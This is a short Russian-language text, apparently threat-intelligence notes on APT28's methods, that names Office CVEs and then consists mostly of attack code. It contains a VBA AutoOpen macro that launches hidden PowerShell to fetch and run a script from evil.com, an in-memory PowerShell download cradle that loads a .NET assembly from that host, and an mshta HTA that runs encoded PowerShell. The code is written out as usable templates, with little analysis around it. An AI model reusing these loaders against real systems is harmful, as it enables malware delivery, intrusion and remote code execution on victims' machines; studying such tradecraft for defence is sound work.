APT28 использует spear-phishing с документами, содержащими макросы или уязвимости OLE. Часто эксплуатирует уязвимости в Microsoft Office (например, CVE-2017-11882, CVE-2018-0802). Также применяет PowerShell для загрузки и выполнения вредоносного кода.
// Пример вредоносного макроса в документе Office Sub AutoOpen() Dim strPayload As String strPayload = "powershell -w hidden -nop -c IEX (iwr 'http://evil.com/payload.ps1' -UseBasicParsing)" Shell strPayload End Sub // PowerShell-скрипт, вызываемый из макроса function Invoke-DownloadCradle { $url = "http://evil.com/stage2.bin" $wc = New-Object Net.WebClient $data = $wc.DownloadData($url) # Загрузка сборки в память $asm = [System.Reflection.Assembly]::Load($data) $entry = $asm.EntryPoint # Вызов точки входа $entry.Invoke($null, (New-Object object[] $entry.GetParameters().Count)) }
// Использование Living off the Land (LotL) бинарников для выполнения // mshta.exe для запуска HTA с JScript // mshta.exe http://evil.com/malicious.hta // Содержимое malicious.hta <html> <head> <HTA:APPLICATION ID="oob" APPLICATIONNAME="Evil"> </head> <body> <script> var shell = new ActiveXObject("WScript.Shell"); shell.Run("powershell -enc JAB...", 0, true); </script> </body> </html>